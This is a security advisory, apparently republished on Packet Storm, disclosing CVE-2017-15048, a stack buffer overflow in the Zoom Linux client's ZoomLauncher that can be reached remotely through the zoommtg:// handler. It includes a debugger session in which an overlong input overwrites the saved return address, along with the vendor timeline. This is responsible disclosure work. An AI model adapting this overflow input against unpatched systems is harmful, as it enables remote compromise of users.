exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Zoom Linux Client 2.0.106600.0904 Buffer Overflow

Zoom Linux Client 2.0.106600.0904 Buffer Overflow
Posted Dec 17, 2017
Authored by Gabriel Quadros, Ricardo Silva

The binary /opt/zoom/ZoomLauncher is vulnerable to a buffer overflow because it concatenates a overly long user input to a stack variable without checking if the destination buffer is long enough to hold the data. The binary also has important security features like canary turned off. The client registers a scheme handler (zoommtg://) and this makes possible to trigger the vulnerability remotely. Version 2.0.106600.0904 is affected.

tags | exploit, overflow
advisories | CVE-2017-15048
SHA-256 | acc225bd1b21250c626dc4a00829cd53ab675137c05067793a79cfb388ed3cf7

Zoom Linux Client 2.0.106600.0904 Buffer Overflow

Change Mirror Download
[CONVISO-17-002] - Zoom Linux Client Stack-based Buffer Overflow Vulnerability

1. Advisory Information
Conviso Advisory ID: CONVISO-17-002
CVE ID: CVE-2017-15048
CVSS v2: 6.8, (AV:N/AC:M/Au:N/C:P/I:P/A:P)
Date: 2017-10-01

2. Affected Components
Zoom client for Linux, version 2.0.106600.0904 (zoom_amd64.deb).
Other versions may be
vulnerable.

3. Description
The binary /opt/zoom/ZoomLauncher is vulnerable to a buffer
overflow because it concatenates a
overly long user input to a stack variable without checking if the
destination buffer is long
enough to hold the data.
The binary also has important security features like canary turned off.
The client registers a scheme handler (zoommtg://) and this makes
possible to trigger the
vulnerability remotely.

4. Details
gef> checksec
[+] checksec for '/opt/zoom/ZoomLauncher'
Canary : No
NX : Yes
PIE : No
Fortify : No
RelRO : Partial
gef>

gef> r $(python -c 'print "A"*1048 + "BBBBBBBB"')
Starting program: /opt/zoom/ZoomLauncher $(python -c 'print
"A"*1048 + "BBBBBBBB"')
ZoomLauncher started.

Breakpoint 4, 0x00000000004025a6 in main ()
gef> x/5i $pc
=> 0x4025a6 <main+367>: call 0x4010f0 <strcat@plt>
0x4025ab <main+372>: lea rax,[rbp-0x410]
0x4025b2 <main+379>: mov rcx,0xffffffffffffffff
0x4025b9 <main+386>: mov rdx,rax
0x4025bc <main+389>: mov eax,0x0
gef> x/s $rdi
0x7fffffffd330: ""
gef> x/s $rsi
0x7fffffffdc35: 'A' <repeats 1048 times>, "BBBBBBBB"
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025a6 in main; saved rip = 0x7ffff7216f45
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef> ni
0x00000000004025ab in main ()
gef> i f
Stack level 0, frame at 0x7fffffffd750:
rip = 0x4025ab in main; saved rip = 0x4242424242424242
Arglist at 0x7fffffffd740, args:
Locals at 0x7fffffffd740, Previous frame's sp is 0x7fffffffd750
Saved registers:
rbp at 0x7fffffffd740, rip at 0x7fffffffd748
gef>

5. Solution
Upgrade to latest version.

6. Credits
Ricardo Silva <rsilva@conviso.com.br>
Gabriel Quadros <gquadros@conviso.com.br>

7. Report Timeline
Set 28, 2017 - Conviso sent first email asking for a channel to
discuss the vulnerability.
Set 28, 2017 - Vendor asked the report in the current channel.
Set 28, 2017 - Conviso sent informations to reproduce the vulnerability.
Set 28, 2017 - Conviso asked if they could reproduce it.
Set 28, 2017 - Vendor replied saying that the informations were
forwarded to engineering team.
Oct 5, 2017 - Vendor provided a patch candidate for testing.
Oct 5, 2017 - Conviso pointed problems in the patch.
Oct 11, 2017 - Vendor provided a patch candidate for testing.
Oct 12, 2017 - Conviso pointed problems in the patch.
Oct 23, 2017 - Conviso asked for status.
Oct 27, 2017 - Conviso asked for status.
Nov 1, 2017 - Conviso asked for status.
Nov 3, 2017 - Vendor replied.
Nov 6, 2017 - Conviso asked for status.
Nov 6, 2017 - Vendor replied.
Nov 9, 2017 - Conviso asked for status.
Nov 13, 2017 - Conviso asked for status.
Nov 15, 2017 - Conviso asked for status.
Nov 16, 2017 - Vendor provided a patch candidate for testing.
Nov 16, 2017 - The patch seems to fix the attack vector, although
no further research was done.
Nov 20, 2017 - Vendor thanked and marked the issue as solved,
considering the patch as a
sastifactory fix.
Nov 30, 2017 - Vendor released the version 2.0.115900.1201

8. References
https://zoom.us/download
https://support.zoom.us/hc/en-us/articles/205759689-New-Updates-for-Linux

9. About Conviso
Conviso is a consulting company specialized on application
security. Our values are based on the
allocation of the adequate competencies on the field, a clear and
direct speech with the market,
collaboration and partnership with our customers and business
partners and constant investments
on methodology and research improvement. For more information
about our company and services
provided, please check our website at www.conviso.com.br.

10. Copyright and Disclaimer
The information in this advisory is Copyright 2017 Conviso
Application Security S/A and provided
so that the society can understand the risk they may be facing by
running affected software,
hardware or other components used on their systems. In case you
wish to copy information from
this advisory, you must either copy all of it or refer to this
document (including our URL). No
guarantee is provided for the accuracy of this information, or
damage you may cause your systems
in testing.


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close